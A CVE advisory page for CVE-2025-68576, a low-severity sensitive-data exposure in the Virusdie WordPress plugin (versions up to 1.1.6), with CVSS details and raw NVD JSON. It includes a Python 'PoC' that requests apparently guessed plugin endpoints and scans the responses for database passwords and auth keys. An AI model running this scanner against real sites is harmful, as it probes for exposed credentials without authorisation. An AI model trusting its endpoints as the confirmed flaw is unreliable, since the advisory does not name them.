Security Vulnerability Report
中文
CVE-2025-68576 CVSS 4.3 MEDIUM

CVE-2025-68576

Published: 2025-12-24 13:16:25
Last Modified: 2026-04-27 19:16:32

Description

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Virusdie Virusdie virusdie allows Retrieve Embedded Sensitive Data.This issue affects Virusdie: from n/a through <= 1.1.6.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Virusdie WordPress Plugin <= 1.1.6
Virusdie WordPress Plugin from n/a through <= 1.1.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-68576 PoC - Virusdie WordPress Plugin Sensitive Data Exposure # Target: WordPress site with Virusdie plugin <= 1.1.6 target_url = "http://target-wordpress-site.com" # PoC endpoints that may expose sensitive information endpoints = [ "/wp-json/virusdie/v1/config", "/wp-json/virusdie/v1/files", "/wp-json/virusdie/v1/settings", "/wp-content/plugins/virusdie/includes/api.php" ] def check_vulnerability(url): """Check if target is vulnerable to CVE-2025-68576""" results = [] for endpoint in endpoints: try: full_url = url.rstrip('/') + endpoint response = requests.get(full_url, timeout=10, verify=False) # Check for sensitive data exposure if response.status_code == 200: content = response.text sensitive_keywords = [ 'DB_NAME', 'DB_USER', 'DB_PASSWORD', 'DB_HOST', 'AUTH_KEY', 'SECURE_AUTH_KEY', 'API_KEY', 'password', 'secret', 'key' ] for keyword in sensitive_keywords: if keyword.lower() in content.lower(): results.append({ 'endpoint': endpoint, 'status': 'VULNERABLE', 'found_sensitive_data': keyword }) print(f"[!] Vulnerable endpoint found: {endpoint}") print(f"[+] Sensitive keyword detected: {keyword}") break except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {str(e)}") return results if __name__ == "__main__": print("CVE-2025-68576 PoC - Virusdie Plugin Sensitive Data Exposure") print("=" * 60) results = check_vulnerability(target_url) if results: print(f"\n[!] Target is VULNERABLE to CVE-2025-68576") print(json.dumps(results, indent=2)) else: print("\n[+] Target appears to be patched or not using Virusdie plugin")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68576", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:24.660", "lastModified": "2026-04-27T19:16:32.437", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Virusdie Virusdie virusdie allows Retrieve Embedded Sensitive Data.This issue affects Virusdie: from n/a through <= 1.1.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/virusdie/vulnerability/wordpress-virusdie-plugin-1-1-6-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}